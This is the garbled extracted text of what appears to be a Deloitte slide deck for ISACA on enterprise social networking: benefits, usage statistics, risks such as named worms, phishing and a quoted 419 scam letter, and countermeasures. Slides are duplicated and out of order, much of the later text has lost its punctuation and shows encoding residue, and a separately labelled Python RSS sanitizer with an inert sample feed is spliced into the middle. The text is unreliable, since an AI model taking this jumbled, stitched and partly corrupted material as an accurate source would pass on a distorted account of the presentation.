http://news.bbc.co.uk/2/hi/business/8325865.stm
Risks and challenges (cont.)
• Technical Integration — Most organizations note that integration between individual Web 2.0 applications and their overall infrastructure is a major concern
  – Sign in using your account with:
    • Facebook
    • Twitter
    • Myspace
    • Yahoo
    • Google
    • Windows Live ID
    • AOL
    • Blogger
    • WordPress
    • Netlog
    • OpenID
    • flickr
Risks and challenges (cont.)
• Information hoarding — In many industries value is placed on what an employee knows that others do not know. This belief prevents data sharing.
• Quantification — Researchers currently face challenges quantifying social networking benefits
  – Valuation techniques include, among others, Beckstrom's law, which states that — “The value of a network equals the net value of each user's transactions conducted through that network, valued from the perspective of each user and summed for all”
Or, alternatively:
  – http://en.wikipedia.org/wiki/Beckstrom's_law
Risks and challenges (cont.)
• Litigation issues — Discrimination, defamation, violation of privacy and harassment are some of the potential concerns that might result in litigation
A quick word on privacy
“People have really gotten comfortable not only sharing more information and different kinds, but more openly and with more people. That social norm is just something that has evolved over time.”
— Mark Zuckerberg, Facebook founder
“If you have something that you don't want anyone to know, maybe you shouldn't be doing it in the first place.”
— Eric Schmidt, CEO, Google Inc.
A quick word on privacy (cont.)
• Loss of Fourth Amendment protection
• Encryption of data storage unlikely
• Lack of encryption while data is in use
• Data remanence – limited attempt to address it
Responding to the risks and challenges
• Policies and procedures
  – Acceptable use policy
    • Details how social networking sites and applications can be used
    • Defines consequences for failure to comply, e.g. “termination of employment and legal action”
• Risk assessment
  – Establish what information is most critical to the business
  – Understand how information might become vulnerable and how to protect it (data mapping)
Responding to the risks and challenges (cont.)
• Education and awareness
  – Inform users of the information security risks involved and how to guard against them
    • For example, only install or run applications from trusted sources approved by the corporate IT department
Responding to the risks and challenges (cont.)
• Vulnerability Assessments
  – Identifying, quantifying and prioritizing the potential vulnerabilities that Social Networking may present to the organization
• Firewalls
  – Historically, firewalls focused on ports, IP addresses and packets
  – But social networking applications operate on ports 80 & 443, so a port-based rule cannot tell them apart from ordinary Web traffic
  – Next-generation firewall technology offers granular control of social networking functionality:
    • Identify applications regardless of port, protocol, evasive tactic or SSL
    • Identify users regardless of IP address
    • Scan application content in real time
    • Visibility and policy control over application access
What is next in the world of social networking
Where we are at today
• Enterprise Social Media has crossed the tipping point and is no longer considered an “emerging” technology
[Figure: “The Hype Cycle” — http://en.wikipedia.org/wiki/Hype_cycle]
What's next in the world of social networking
• Increase in the use of mobile devices to access Social Networks
  – Over 600 million people will use their phone to access Social Networks by 2013, an increase of more than 400% on the 2009 figure of 140 million. Source — eMarketer
• Increase in frequency of access
  – Facebook mobile users are 50% more active than other users of the site
• Take your social profile with you as you travel the Web
  – For example — Facebook Connect
• Social Networks will become more pervasive — broadcasting your location in geo-networking apps
  – Interaction between devices. For example, your car's navigation system will be able to learn your friend's location and provide directions to them
Some further predictions
• Some quotes on social networks
  – “Probably the greatest transformative force in our generation, absent a major war” — Mark Zuckerberg, Facebook founder
  – “(Twitter is)… Something important that has the potential to change the world, though we have a long way to go” — Biz Stone, Co-founder of Twitter
Q&A
Today's Presenters
Nelson Gibbs
Senior Manager
AERS – Audit & Enterprise Risk Services
Deloitte & Touche LLP
ngibbs@deloitte.com
+1 213 593 4241
Appendix
• Additional resources
  – Gopal, Raj et al., “Web 2.0 reinvents corporate networking”, Deloitte Consulting LLP (2008)
  – The Economist — A special report on social networking, January 30, 2010
  – Fraser, Matthew; Dutta, Soumitra (2008). Throwing Sheep in the Boardroom: How Online Social Networking Will Transform Your Life, Work and World
  – “Wall of Facebook: The Social Network's Plan to Dominate the Internet — and Keep Google Out” by Fred Vogelstein, Wired Magazine (June 2009), http://www.wired.com/techbiz/it/magazine/17-07/ff_facebookwall
  – “The Future is Social, Not Search, Facebook COO Says” by Ryan Singel, Wired Magazine (October 2009), http://www.wired.com/epicenter/2009/10/facebook-social-2
  – British Computer Society Social Media Web site — http://www.bcs.org/socialmedia
This presentation contains general information only, and Deloitte is not, by means of this presentation, rendering accounting, business, financial, investment, legal, tax or other professional advice or services. This presentation is not a substitute for such professional advice or services, nor should it be used as a basis for any decision or action that may affect your business. Before making any decision or taking any action that may affect your business, you should consult a qualified professional advisor.
Deloitte, its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation.
Social network — More terminology (cont.)
Microblogging
• Short, frequent posts with questions, information or current status
• Twitter (public) and Yammer (private) are two examples
• Social software (including Facebook, LinkedIn and MySpace) now prompts for “what's on your mind” or similar status or mood lines
Social network — More terminology (cont.)
Wikis
• Web sites which allow users to easily add, remove, edit and change most available content
• Effective for collaborative writing and self-service Web site creation and maintenance
Social network — More terminology (cont.)
Wikis (cont.)
• Wikipedia – perhaps the best known Wiki
  – Launched on 15 January 2000
  – First edit on 16 January, followed by 1000 articles in the first month
  – Now has 17 million articles in 270 languages, all written by volunteers
  – Billionth edit took place on 16 April 2010
  – Used by 400 million people every month
  – Claims to have 80000 editors, although reports suggest that it has recently lost thousands, something Wikipedia disputes
  – Aims to grow to one billion users by 2015, with a focus on women and people in the developing world
  – Critics maintain that many entries are untrustworthy
  – But a disputed study has shown that for subjects such as science it comes as close as traditional encyclopedias
Statistics taken from http://www.bbc.co.uk/news/technology-12171977
Social network — More terminology (cont.)
Social networking software
• A range of tools which facilitate social networking
• Personal Web pages including bios, photos, interests, audio and video, links to friends, messages from friends and personal networks
Social network — More terminology (cont.)
Social networking software (cont.)
• Facebook – the biggest of them all
  – Over 500 million registered users
  – 50% of our active users log on to Facebook in any given day
  – About 70% of Facebook users are outside the US
  – More than 30 billion pieces of content (web links, news stories, blog posts, notes, photo albums, etc.) shared each month
  – People spend over 700 billion minutes per month on Facebook
Statistics taken from http://www.facebook.com/press/info.php?statistics (Sept 2010)
• As of March 13, 2010, Facebook was America's most popular site according to Experian Hitwise, with 7.1% of traffic compared to Google's 7.0%
Social network — More terminology (cont.)
Social bookmarking and tagging
• Sites which allow users to share links to sites with others
• Tags are metadata which classify content into categories
• Can be used to aid searches, create tag clouds and link disparate sources
Social network — More terminology (cont.)
Syndication and mashups
• Using feeds available from a Web site to provide an updated list of its content, in the form of a subscription, an embedded portion of a Web site, or a collection of disparate content on a particular topic
• RSS (Really Simple Syndication) or Atom syndication, and .rss, .xml or .rdf files used for the feeds
• Mashups combine data and feeds from multiple sources to provide a single integrated set of information, e.g. data plotted on a map
Social network — More terminology (cont.)
Videos and photos
• Online collections of videos and photos from users
• Users can upload, tag and rate content
Social Networking Companies

Social Media                      Popular Examples
--------------------------------  ------------------------------------------------------
Wikis                             Wikitravel, Wikipedia, wikiHow, WikiBooks, the TV IV
Blogs                             livejournal, WordPress, Blogger, Technorati, xanga
Social Networking                 myspace.com, LinkedIn, facebook, friendster, plaxo
RSS (Really Simple Syndication)   newsgator, Bloglines, iGoogle, FeedBurner
Presence and Microblogging        twitter, Pownce, jaiku, Hictu, tumblr
Social Bookmarking and Tagging    delicious, digg, reddit, newsvine, StumbleUpon
Online Photo and Video Sharing    YouTube, flickr, shutterfly, last.fm, slideshare
Why and how companies are using social networking
Statistics on companies using Social Networking
[Chart] Data was collected between November 2009 and January 2010 among the Fortune Global 100 companies: US = 29 companies, Europe = 48 companies, Asia-Pacific = 20 companies, Latin America = 3 companies.
Source: http://www.burson-marsteller.com/Innovation_and_insights/blogs_and_podcasts/BM_Blog/Documents/Burson-Marsteller%202010%20Global%20Social%20Media%20Check-up%20white%20paper.pdf
Statistics on companies using Social Networking (cont.)
[Chart] Data was collected between November 2009 and January 2010 among the Fortune Global 100 companies: US = 29 companies, Europe = 48 companies, Asia-Pacific = 20 companies, Latin America = 3 companies.
Source: http://www.burson-marsteller.com/Innovation_and_insights/blogs_and_podcasts/BM_Blog/Documents/Burson-Marsteller%202010%20Global%20Social%20Media%20Check-up%20white%20paper.pdf
Companies typically adopt Social Media for three major benefits
1. Increase employee productivity and operational efficiencies
2. Foster creativity, innovation and collaboration
3. Enhance customer and partner relationships
Increase employee productivity and operational efficiencies
• Creates a lightweight institutional memory system for a company's intellectual assets to be easily captured, stored and accessed
• Reduce the net volume of e-mail and allow users to “pull” information at their convenience, as opposed to spending time reading through mass e-mail chains
• Create better quality deliverables faster by drawing on the collective talents, knowledge and experiences of other employees around the world
Operational efficiencies
• A leading energy company realized approximately $250K in annual cost savings by conducting its employee conference virtually using Social Media
Improved reporting
• A global investment bank tightened reporting cycle times from several weeks to “about 30 seconds” per stakeholder by enabling them to submit their information directly into a team wiki and making that information instantly available to others in a rich dashboard mashup
Increase employee productivity and operational efficiencies (cont.)
• American Red Cross
  – Designed to incite discussions around issues the American Red Cross cares about, describe actions individuals can take (online or offline) to help people prevent, prepare for and respond to emergencies, and give valuable information about preventing, preparing for and responding to emergencies. http://redcrosschat.org
Increase employee productivity and operational efficiencies (cont.)
• Deloitte's DWiki
  – Provides a safe, flexible knowledge creation and information sharing environment for all Deloitte practitioners across country, practice and Deloitte organizational borders
  – Enhances the client service delivery capabilities of our Deloitte practitioners
  – Serves as a test environment for innovative concepts and solutions which expand the business interests of Deloitte
As used in this document, “Deloitte” means Deloitte LLP. Please see www.deloitte.com/us/about for a detailed description of the legal structure of Deloitte LLP and its subsidiaries.
Foster creativity, innovation and collaboration
• Harness product, process and service innovations by unlocking creativity and ideas from any area of the company
• The diverse group feedback inherent in social computing accelerates the problem-solving process and produces better solutions
• Employees create unexpected connections with one another and expand their base of knowledge, experience and circle of trusted colleagues
Product innovation
• A leading high-tech manufacturer instituted a “submit-and-vote-for-your-favorite-idea” social community with its consumers, generating over 5000 ideas and over 300000 votes in its first three months and subsequently identifying new product offerings
Information capture
• A federal agency created an internal wiki to bolster the capture and dissemination of mission-critical information between field agents
Foster creativity, innovation and collaboration (cont.)
• Best Buy
  – A community of Best Buy employees who convene regularly to share knowledge, best practices, frustrations, aspirations and a few jokes. Community members include everyone from recent high school graduates to semi-retirees. https://mix.blueshirtnation.com
Foster creativity, innovation and collaboration (cont.)
• Deloitte's DStreet
  – Enterprise talent networking site – changing the way we connect with each other
  – Enables another way of collaboration and community building
  – Network, build new relationships and forge successful careers
  – Learn about colleagues and interesting ways to introduce yourself
  – Identify new connection points to create a basis for meaningful conversation
  – A new way of assembling the right team
As used in this document, “Deloitte” means Deloitte LLP. Please see www.deloitte.com/us/about for a detailed description of the legal structure of Deloitte LLP and its subsidiaries.
Enhance customer and partner relationships
• Opens the lines of communication beyond typical spokespeople such as marketing, sales and PR, and provides an avenue for other important stakeholders (e.g. engineers, scientists, product managers) to gather firsthand feedback from customers
• Allow customers to access help beyond traditional means with networks that provide peer support and a user-generated knowledgebase, while monitoring customer perception
• Provide a forum for collaborative business development, education and communications with vendors, OEMs and other partners
• Allow consumers who know your products and services best to become a part of the new offering development process
Revenue growth
• A major consumer goods company improved sales by 31.5% by including customer ratings, user-generated product reviews and other social features on its online storefront, also resulting in a 40% uptick in average order value
Enhance customer and partner relationships (cont.)
• Procter & Gamble
  – Capessa launched in the “Yahoo Health” section of Yahoo.com, one of the world's leading internet destinations. Women who register with Capessa.yahoo.com have access to several topic areas, including parenting, pregnancy, weight loss, relationships, career, healthy living and care giving. http://realwomenrealadvice.com
Enhance customer and partner relationships (cont.)
• American Express
  – OPEN Forum, an online resource and networking site for business owners. The site is designed to forge meaningful business connections and provide practical, actionable information and insights from influential bloggers, industry leaders and savvy entrepreneurs. http://www.openforum.com
Enhance customer and partner relationships (cont.)
• State of Louisville, Kentucky
  – Interactive audit findings on Web site. Allows the users to discuss previous audit findings. http://www.louisvilleky.gov/InternalAudit
Enhance customer and partner relationships (cont.)
• Amazon
  – A social network for people who love books. Users are able to create a virtual shelf to show off their books, see what their friends are reading and discover new books. http://www.shelfari.com
Enhance customer and partner relationships (cont.)
• Bank of America (BofA)
  – On January 29, 2010, the Bank of America Web site was down. BofA used Twitter to keep in touch with its customers and let them know the latest update.
Risks and challenges
Risks and challenges
• Farmers and Mobsters
  – Top Facebook Applications

Rank  Name                      Monthly Active Users
----  ------------------------  --------------------
1     FarmVille                 82580911
2     Static FBML               46827021
3     Birthday Cards            41904049
4     Café World                30032716
5     Facebook for iPhone       29438848
6     Texas HoldEm Poker        28332917
7     Slide FunSpace            25630033
8     Happy Aquarium (BETA)     24915971
9     Mafia Wars                24704179
10    Causes                    24317292

• Source – http://statistics.allfacebook.com/applications/leaderboard (March 2010)
• There are now more than 500000 active applications on the Facebook Platform
Risks and challenges (cont.)
• New security concerns and attack vectors — a result of the shift in technology towards Web services that empower server-side core technology components, as well as Asynchronous JavaScript and XML (“AJAX”) and Rich Internet Application (“RIA”) clients that enhance client-end interfaces in the browser itself
• Top 10 Web 2.0 Attack Vectors — http://net-square.com/whitepapers/Top10_Web2.0_AV.pdf
  – Cross-site scripting (“CSS”) in AJAX, e.g. the “Samy worm that exploited MySpace.com's CSS flaw”
  – XML poisoning — poisoned XML blocks coming from the AJAX client
  – Malicious AJAX code execution — replay of cookies for each request
  – RSS/Atom injection — JavaScript injected into RSS feeds is executed in the client browser that renders the feed
  – Web Services Definition Language (“WSDL”) scanning and enumeration
  – Client-side validation in AJAX routines — failure to perform the same checks on the server side
  – Web services routing issues — compromise of intermediate nodes
  – Parameter manipulation with SOAP — web services consume information and variables from SOAP
  – XPATH injection in SOAP messages — bypass of authentication mechanisms
  – RIA thick client binary manipulation — issues with session management
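The following Python is an added example, not code from the presentation, showing the defensive counterpart to two of the vectors above (RSS/Atom injection and client-side-only validation): an allow-list sanitizer that cleans feed item HTML on the server before any browser renders it. The feed in SAMPLE_RSS is constructed for the demonstration.

```python
"""Server-side sanitizing of syndicated (RSS) content before it reaches a browser.

Added example, not from the presentation. SAMPLE_RSS is a constructed feed item
with injected active content; the sanitizer enforces an allow-list on the server
instead of trusting any checks done in the client.
"""
import xml.etree.ElementTree as ET
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

# Formatting tags a feed reader needs; anything not listed is dropped.
ALLOWED_TAGS = {"p", "b", "i", "em", "strong", "a", "br", "ul", "ol", "li"}
# Attributes allowed per tag: no style, no on* event handlers.
ALLOWED_ATTRS = {"a": {"href", "title"}}
# Only absolute http(s) links survive; javascript:, data:, vbscript: etc. do not.
SAFE_SCHEMES = {"http", "https"}
# The text inside these elements is discarded, not merely their tags.
DROP_CONTENT_TAGS = {"script", "style"}


def _safe_url(url):
    """Allow-list check on a URL: absolute and http/https only (fails safe)."""
    if not url:
        return False
    parsed = urlparse(url.strip())
    return parsed.scheme.lower() in SAFE_SCHEMES and bool(parsed.netloc)


class FeedSanitizer(HTMLParser):
    """Rebuilds an HTML fragment keeping only allow-listed tags and attributes."""

    def __init__(self):
        # convert_charrefs decodes entity-encoded tricks before we check them
        super().__init__(convert_charrefs=True)
        self.out = []
        self._skip_depth = 0  # > 0 while inside <script> or <style>

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT_TAGS:
            self._skip_depth += 1
            return
        if self._skip_depth or tag not in ALLOWED_TAGS:
            return
        kept = []
        for name, value in attrs:
            value = value or ""
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue  # drops onclick=, onerror=, style=, ...
            if name == "href" and not _safe_url(value):
                continue  # drops javascript: and other non-http(s) links
            kept.append(f' {name}="{escape(value)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT_TAGS:
            self._skip_depth = max(0, self._skip_depth - 1)
            return
        if self._skip_depth or tag not in ALLOWED_TAGS or tag == "br":
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skip_depth:
            self.out.append(escape(data))  # text can never turn back into markup
    # Comments, declarations and processing instructions reach the base class,
    # which emits nothing, so they are dropped.


def sanitize_html(fragment):
    """Return the allow-listed version of an HTML fragment."""
    parser = FeedSanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out)


def sanitize_feed(rss_xml):
    """Parse an RSS 2.0 document and return its items with cleaned HTML."""
    # For feeds from untrusted sources also bound entity expansion (for example
    # with the defusedxml package) to cover the "XML poisoning" item.
    root = ET.fromstring(rss_xml)
    items = []
    for item in root.iter("item"):
        link = (item.findtext("link") or "").strip()
        items.append({
            "title": escape(item.findtext("title") or ""),
            "description": sanitize_html(item.findtext("description") or ""),
            "link": link if _safe_url(link) else "",
        })
    return items


# Constructed sample: a legitimate item with injected active content.
SAMPLE_RSS = """<?xml version="1.0"?>
<rss version="2.0"><channel><title>Constructed sample feed</title>
<item>
  <title>Quarterly results &amp; outlook</title>
  <link>http://example.com/results</link>
  <description><![CDATA[
    <p>Read the <a href="http://example.com/results" onclick="track()">full report</a>.</p>
    <script>/* injected active content */</script>
    <p><a href="javascript:void(0)" title="more">Click here</a> for details.</p>
    <img src="x" onerror="run()">
  ]]></description>
</item>
</channel></rss>"""
```

Running `sanitize_feed(SAMPLE_RSS)` returns the item with the script element, the event handlers and the javascript: link removed while the legitimate link and formatting are kept.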
Risks and challenges (cont.)
• Example worms and phishing attacks affecting social networking sites
  – Koobface – targets Facebook, MySpace, hi5, Bebo, Twitter and other sites. Users are prompted to click on a URL purporting to be an update from Adobe, and a worm is downloaded to the PC which looks for personal data
  – Fbaction – Facebook phishing attack that encourages users to sign up for fbaction.net using their Facebook credentials. Those credentials are then used to hijack the Facebook account
Risks and challenges (cont.)
  – Boface – convinces users to click on a link pointing to a video, resulting in a download. Shortly after the download is complete, the user's Facebook account is hijacked and used as a means of spamming (and propagating the worm to) all their friends
• Common element – they all take advantage of the implied trust that social networking users have in each other
wwwisacaorg39
Risks and challenges (cont)Risks and challenges (cont)
ldquoHas what weve learned about writing software the last 20 years been expressed in the design of Web 20 Of course not It cant even be said to have a design If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming Web 20 would not be happeningrdquo - Marcus Ranum in InfoSec Magazine May 2008
bull Trust mdash Data reliability commonly causes issues for social media in the workplace The Web has partially solved this with techniques such as inbound link counting but reputation and voting systems are starting to appear often as plug-ins for social media tools
bull May also take advantage of URL Shortening ndash bitly trim tinyurlcom etc
wwwisacaorg40
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment
wwwisacaorg41
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment (cont)
ldquoDearest Onehellip
Sorry for the nature of this email please bear with me
I am Natasha Kone a 22 year old lady now i was born on the 1st of January 1986 to the family of Kone My fatherrsquos name is Kamara Cone He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively I am their only child When I was a kid I attended a private school and things were well for me and my parents Things changed when I was in High School my mother died on the 21st October 1994 My father then took me very special and gave me motherly care As fate had it my father died last yearhelliphelliphelliphelliphelliphelliphelliprdquo- See httpwww419legalorg for more details
bull The 419 scams have evolved with the technology ndash now using LinkedIn to target specific individuals
wwwisacaorg42
Risks and challenges (cont)Risks and challenges (cont)
bull Reputation mdash Damage to company brandreputation through inappropriate comments or remarks from employeesndash Even a lack of a response may damage the brand For example XYZ Company Inc
creates a Twitter account call XYZ_Cares and then fails to use the accountndash Other examples include creating social media program but not telling the rest of the
company about it so they may be unaware of any promotions or offers being publicized
bull Copyright violation mdash Third-party material such as essays articles and photographs are used without written consent from the proprietor
bull Intellectual Property theft mdash Harder to prevent inadvertent data leakage through the one-to-many nature of Web 20 as a medium
wwwisacaorg43
Risks and challenges (cont)Risks and challenges (cont)
bull Failures in the use of Social Media mdash most companies that use Social Media donrsquot approach it the way they would with other mission critical technologyndash At best it can be said that most companies today are merely dabbling with Social
Mediahellipndash Few have approached the solution with an integrated strategy or a concrete business
case usually because they either arenrsquot fully convinced of its value or have been slowed by the security and legal issues
ndash Without a strategy and proper metrics based on a business case their projects will remain small mismanaged and likely to fail
ldquoFully half of all Social Media investments will failrdquomdash Gartner
wwwisacaorg44
Risks and challenges (cont)Risks and challenges (cont)ldquoWhen I discovered YouTube I didnt work for five days I did nothing I viewed cookie monster sings chocolate rain about 1000 timesrdquo- Michael Scott from The Office
bull Productivity mdash Users employ social media tools for nonproductive purposes such as socializing (ldquoSocial Notworkingrdquo)
httpnewsbbccouk2hibusiness8325865stm
wwwisacaorg45
Risks and challenges (cont)Risks and challenges (cont)
bull Technical Integration mdash Most organizations note that integration between individual Web 20 applications and their overall infrastructure is a major concern
ndash Sign in using your account withbull Facebook AOLbull Twitter Bloggerbull Myspace WordPressbull Yahoo Netlogbull Google OpenIDbull Windows Live ID flickr
wwwisacaorg46
Risks and challenges (cont)Risks and challenges (cont)
bull Information hoarding mdash In many industries value is placed on what an employee knows that others do not know This belief prevents data sharing
bull Quantification mdash Researchers currently face challenges quantifying social networking benefitsndash Valuation techniques include among others Beckstromrsquos law which states that mdash ldquoThe
value of a network equals the net value of each userrsquos transactions conducted through that network valued from the perspective of each user and summed for allrdquo
Or alternatively
ndash httpenwikipediaorgwikiBeckstromrsquos_law
wwwisacaorg47
Risks and challenges (cont)Risks and challenges (cont)
bull Litigation issues mdash Discrimination defamation violation of privacy and harassment are some of the potential concerns that might result in litigation issues
wwwisacaorg48
A quick word on privacyA quick word on privacy
ldquoPeople have really gotten comfortable not only sharing more information and different kinds but more openly and with more people That social norm is just something that has evolved over timerdquo
mdash Mark Zuckerberg Facebook founder
ldquoIf you have something that you donrsquot want anyone to know maybe you shouldnrsquot be doing it in the first placerdquo
mdash Eric Schmidt CEO Google Inc
wwwisacaorg49
A quick word on privacy (cont)A quick word on privacy (cont)
bull Loss of Fourth Amendment protectionbull Encryption of data storage unlikelybull Lack of encryption while data in usebull Data remanence limited attempt to address
wwwisacaorg50
Responding to the risks and challengesResponding to the risks and challenges
bull Policies and proceduresndash Acceptable use policy
bull Details how social networking sites and applications can be usedbull Define consequences for failure to comply eg ldquotermination of employment and
legal actionrdquo
bull Risk assessmentndash Establish what information is most critical to the businessndash Understand how information might become vulnerable and how to protect it
(data mapping)
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
www.isaca.org 55
What's next in the world of social networking
• Increase in the use of mobile devices to access social networks
  – Over 600 million people will use their phone to access social networks by 2013, an increase of more than 400% over the 2009 figure of 140 million (Source — eMarketer)
• Increase in frequency of access
  – Facebook mobile users are 50% more active than other users of the site
• Take your social profile with you as you travel the Web
  – For example — Facebook Connect
• Social networks will become more pervasive — broadcasting your location in geo-networking apps
  – Interaction between devices. For example, your car's navigation system will be able to learn your friend's location and provide directions to them
www.isaca.org 56
Some further predictions
• Some quotes on social networks
  – "Probably the greatest transformative force in our generation, absent a major war" — Mark Zuckerberg, Facebook founder
  – "(Twitter is)… Something important that has the potential to change the world, though we have a long way to go" — Biz Stone, co-founder of Twitter
www.isaca.org 57
Q&A
www.isaca.org 58
Today's Presenters
Nelson Gibbs
Senior Manager
AERS – Audit & Enterprise Risk Services
Deloitte & Touche LLP
ngibbs@deloitte.com
+1 213 593 4241
www.isaca.org 59
Appendix
• Additional resources
  – Gopal Raj et al., "Web 2.0 reinvents corporate networking," Deloitte Consulting LLP (2008)
  – The Economist — A special report on social networking, January 30, 2010
  – Fraser, Matthew; Dutta, Soumitra (2008). Throwing Sheep in the Boardroom: How Online Social Networking Will Transform Your Life, Work and World
  – "Wall of Facebook: The Social Network's Plan to Dominate the Internet — and Keep Google Out" by Fred Vogelstein, Wired Magazine (June 2009), http://www.wired.com/techbiz/it/magazine/17-07/ff_facebookwall
  – "The Future is Social, Not Search, Facebook COO Says" by Ryan Singel, Wired Magazine (October 2009), http://www.wired.com/epicenter/2009/10/facebook-social-2
  – British Computer Society Social Media Web site — http://www.bcs.org/socialmedia
www.isaca.org 60
This presentation contains general information only, and Deloitte is not, by means of this presentation, rendering accounting, business, financial, investment, legal, tax or other professional advice or services. This presentation is not a substitute for such professional advice or services, nor should it be used as a basis for any decision or action that may affect your business. Before making any decision or taking any action that may affect your business, you should consult a qualified professional advisor.
Deloitte, its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation.
www.isaca.org 10
Social network — More terminology (cont.): Wikis
• Web sites which allow users to easily add, remove, edit and change most available content
• Effective for collaborative writing and self-service Web site creation and maintenance
www.isaca.org 11
Social network — More terminology (cont.): Wikis (cont.)
• Wikipedia – perhaps the best known wiki
  – Launched on 15 January 2000
  – First edit on 16 January, followed by 1,000 articles in the first month
  – Now has 17 million articles in 270 languages, all written by volunteers
  – Billionth edit took place on 16 April 2010
  – Used by 400 million people every month
  – Claims to have 80,000 editors, although reports suggest that it has recently lost thousands, something Wikipedia disputes
  – Aims to grow to one billion users by 2015, with a focus on women and people in the developing world
  – Critics maintain that many entries are untrustworthy
  – But a disputed study has shown that for subjects such as science it comes as close as traditional encyclopedias
Statistics taken from http://www.bbc.co.uk/news/technology-12171977
www.isaca.org 12
Social network — More terminology (cont.): Social networking software
• A range of tools which facilitate social networking
• Personal Web pages including bios, photos, interests, audio and video, links to friends, messages from friends and personal networks
www.isaca.org 13
Social network — More terminology (cont.): Social networking software (cont.)
• Facebook – the biggest of them all
  – Over 500 million registered users
  – 50% of our active users log on to Facebook in any given day
  – About 70% of Facebook users are outside the US
  – More than 30 billion pieces of content (web links, news stories, blog posts, notes, photo albums, etc.) shared each month
  – People spend over 700 billion minutes per month on Facebook
Statistics taken from http://www.facebook.com/press/info.php?statistics (Sept 2010)
• As of March 13, 2010, Facebook was America's most popular site according to Experian Hitwise, with 7.1% of traffic compared to Google's 7.0%
www.isaca.org 14
Social network — More terminology (cont.): Social bookmarking and tagging
• Sites which allow users to share links to sites with others
• Tags are metadata which classify content into categories
• Can be used to aid searches, create tag clouds and link disparate sources
www.isaca.org 15
Social network — More terminology (cont.): Syndication and mashups
• Using feeds available from a Web site to provide an updated list of its content, in the form of a subscription, an embedded portion of a Web site, or a collection of disparate content on a particular topic
• RSS (Really Simple Syndication) or Atom syndication, and .rss, .xml or .rdf files used for the feeds
• Mashups combine data and feeds from multiple sources to provide a single integrated set of information, e.g. data plotted on a map
www.isaca.org 16
Social network — More terminology (cont.): Videos and photos
• Online collections of videos and photos from users
• Users can upload, tag and rate content
www.isaca.org 17
Social Networking Companies
Social Media                      | Popular Examples
Wikis                             | Wikitravel, Wikipedia, wikiHow, WikiBooks, the TV IV
Blogs                             | livejournal, WordPress, Blogger, Technorati, xanga
Social Networking                 | myspace.com, LinkedIn, facebook, friendster, plaxo
RSS (Really Simple Syndication)   | newsgator, Bloglines, iGoogle, FeedBurner
Presence and Microblogging        | twitter, Pownce, jaiku, Hictu, tumblr
Social Bookmarking and Tagging    | delicious, digg, reddit, newsvine, StumbleUpon
Online Photo and Video Sharing    | YouTube, flickr, shutterfly, last.fm, slideshare
www.isaca.org 18
Why and how companies are using social networking
www.isaca.org 19
Statistics on companies using Social Networking
Data was collected between November 2009 and January 2010 among the Fortune Global 100 companies: US = 29 companies, Europe = 48 companies, Asia-Pacific = 20 companies, Latin America = 3 companies
Source: http://www.burson-marsteller.com/Innovation_and_insights/blogs_and_podcasts/BM_Blog/Documents/Burson-Marsteller%202010%20Global%20Social%20Media%20Check-up%20white%20paper.pdf
www.isaca.org 20
Statistics on companies using Social Networking (cont.)
Data was collected between November 2009 and January 2010 among the Fortune Global 100 companies: US = 29 companies, Europe = 48 companies, Asia-Pacific = 20 companies, Latin America = 3 companies
Source: http://www.burson-marsteller.com/Innovation_and_insights/blogs_and_podcasts/BM_Blog/Documents/Burson-Marsteller%202010%20Global%20Social%20Media%20Check-up%20white%20paper.pdf
www.isaca.org 21
Companies typically adopt Social Media for three major benefits
1. Increase employee productivity and operational efficiencies
2. Foster creativity, innovation and collaboration
3. Enhance customer and partner relationships
www.isaca.org 22
Increase employee productivity and operational efficiencies
• Creates a lightweight institutional memory system for a company's intellectual assets to be easily captured, stored and accessed
• Reduces the net volume of e-mail and allows users to "pull" information at their convenience, as opposed to spending time reading through mass e-mail chains
• Creates better quality deliverables faster by drawing on the collective talents, knowledge and experiences of other employees around the world
Operational efficiencies
• A leading energy company realized approximately $250K in annual cost savings by conducting its employee conference virtually using social media
Improved reporting
• A global investment bank tightened reporting cycle times from several weeks to "about 30 seconds" per stakeholder by enabling them to submit their information directly into a team wiki and making that information instantly available to others in a rich dashboard mashup
www.isaca.org 23
Increase employee productivity and operational efficiencies (cont.)
• American Red Cross
  – Designed to incite discussions around issues the American Red Cross cares about, describe actions individuals can take (online or offline) to help people prevent, prepare for and respond to emergencies, and give valuable information about preventing, preparing for and responding to emergencies. http://redcrosschat.org
www.isaca.org 24
Increase employee productivity and operational efficiencies (cont.)
• Deloitte's DWiki
  – Provides a safe, flexible knowledge creation and information sharing environment for all Deloitte practitioners across country, practice and Deloitte organizational borders
  – Enhances the client service delivery capabilities of our Deloitte practitioners
  – Serves as a test environment for innovative concepts and solutions which expand the business interests of Deloitte
As used in this document, "Deloitte" means Deloitte LLP. Please see www.deloitte.com/us/about for a detailed description of the legal structure of Deloitte LLP and its subsidiaries.
www.isaca.org 25
Foster creativity, innovation and collaboration
• Harness product, process and service innovations by unlocking creativity and ideas from any area of the company
